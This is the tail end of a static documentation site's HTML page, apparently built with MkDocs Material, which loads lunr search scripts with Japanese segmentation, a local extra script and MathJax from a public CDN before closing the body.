          <script src="../../../assets/javascripts/lunr/lunr.stemmer.support.js"></script>
          
            
              
                <script src="../../../assets/javascripts/lunr/tinyseg.js"></script>
              
              
                <script src="../../../assets/javascripts/lunr/lunr.jp.js"></script>
              
            
          
          
        
      
      <script>app.initialize({version:"0.17.2",url:{base:"../../.."}})</script>
      
        <script src="../../../_static/js/extra.js"></script>
      
        <script src="https://cdn.bootcss.com/mathjax/2.7.2/MathJax.js?config=TeX-MML-AM_CHTML"></script>
      
    
    
      
    
  </body>
</html>